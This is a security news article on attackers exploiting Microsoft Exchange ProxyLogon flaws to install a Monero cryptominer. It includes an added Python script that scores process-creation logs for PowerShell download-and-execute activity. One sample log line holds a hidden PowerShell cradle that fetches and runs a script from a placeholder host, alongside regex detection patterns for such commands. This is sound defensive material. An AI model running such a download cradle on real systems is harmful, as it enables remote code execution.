At the beginning of March, Microsoft discovered that several zero-day vulnerabilities in its Exchange Servers were being actively exploited by a hacking group known as Hafnium. Since then, a large number of attackers, including state-sponsored groups, have started exploiting these vulnerabilities in the wild. Recently, attackers were observed exploiting the same vulnerabilities to mine cryptocurrency.

What has been discovered

Security researchers from Sophos revealed that attackers are exploiting the ProxyLogon vulnerabilities in Microsoft Exchange to install a Monero cryptominer on the targeted servers.
  • The Monero wallet associated with this attack campaign started receiving funds on March 9, which is just a few days after the initial discovery of the ProxyLogon vulnerabilities.
  • To initiate the attack, the attackers run a PowerShell command that fetches a file from a previously hacked server, which, in turn, downloads executable payloads onto the victim’s machine.
  • In addition, the attackers were found using a modified version of the tool PEx64-Injector, which is publicly available on GitHub.
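The first stage described above, a PowerShell command that fetches a file from a remote server, leaves a distinctive trace in process-creation telemetry. The following script is an added illustration of how a defender might triage such events; it is not from the Sophos report or from Cyware. The log lines are constructed samples in a hypothetical "parent|child|command line" layout, the URL is a placeholder, and the heuristic that treats a shell spawned by the IIS worker process (w3wp.exe, which hosts Exchange web services) as suspicious is an assumption added here, not a detail from the article.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation events (not real telemetry).
# Layout assumed for this example: "parent_process|child_process|command_line".
SAMPLE_EVENTS = [
    "w3wp.exe|powershell.exe|powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.example/stage1.ps1')",
    "explorer.exe|powershell.exe|powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "w3wp.exe|cmd.exe|cmd /c whoami",
    "services.exe|powershell.exe|powershell -enc <base64-placeholder>",
    "svchost.exe|powershell.exe|powershell Get-Service",
]

# Indicators of a PowerShell download cradle: fetch something from the network ...
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient", re.I)
# ... and execute it from memory without writing a script file.
EXEC_FROM_MEMORY = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
# Encoded command lines hide the payload from casual log review.
ENCODED = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)
# Flags commonly used to keep the console invisible and skip profile scripts.
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I)
# Assumption: a shell launched by the IIS worker process that hosts Exchange is
# a strong hint of web-shell activity rather than legitimate administration.
WEB_WORKER_PARENTS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}


@dataclass
class Finding:
    event_no: int
    score: int
    reasons: list = field(default_factory=list)


def score_event(parent: str, child: str, cmdline: str) -> list:
    """Return the list of reasons an event looks like a download-and-execute stage."""
    reasons = []
    if parent.lower() in WEB_WORKER_PARENTS and child.lower() in SHELLS:
        reasons.append("shell spawned by IIS worker process")
    if child.lower() == "powershell.exe":
        if DOWNLOAD_CRADLE.search(cmdline):
            reasons.append("remote download")
        if EXEC_FROM_MEMORY.search(cmdline):
            reasons.append("in-memory execution")
        if ENCODED.search(cmdline):
            reasons.append("encoded command")
        if HIDDEN.search(cmdline):
            reasons.append("hidden/noprofile flags")
    return reasons


def scan(events) -> list:
    """Score every event; only events with at least one reason are reported."""
    findings = []
    for i, line in enumerate(events, 1):
        parent, child, cmdline = line.split("|", 2)
        reasons = score_event(parent, child, cmdline)
        if reasons:
            findings.append(Finding(i, len(reasons), reasons))
    # Highest score first so the noisiest event is reviewed first.
    return sorted(findings, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_no}: score {f.score} - {', '.join(f.reasons)}")
```

On the constructed input, event 1 (IIS worker spawning a hidden PowerShell that downloads and executes a script) collects four reasons and is reported first; the routine backup script and the plain Get-Service call are not reported. The score is deliberately additive rather than a single pattern match, so that a benign encoded command or a single network call does not by itself page an analyst, while the combination the article describes does.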

Corrective actions on the way

To cope with the rapidly growing threat, several agencies are working hard to contain the attacks.
  • The FBI carried out an operation to remove malicious web shells from all compromised Microsoft Exchange servers across the U.S., without notifying the servers' owners.
  • The NSA discovered and reported several new vulnerabilities (CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, and CVE-2021-28483) in Microsoft Exchange, which could lead to remote code execution in targeted machines.
  • Microsoft has provided patches for 114 flaws in its April 2021 Patch Tuesday release. These patches include fixes for the bugs in Microsoft Exchange, including two remote code execution vulnerabilities identified by the NSA.

The bottom line

Considering the widespread reach and rapid propagation of Exchange server-based threats, all organizations running Microsoft Exchange Servers are advised to be extra cautious about security. While security agencies are playing their part, organizations and individuals are expected to apply the patches as soon as possible and review all configuration settings to protect their email infrastructure from compromise.

Cyware Publisher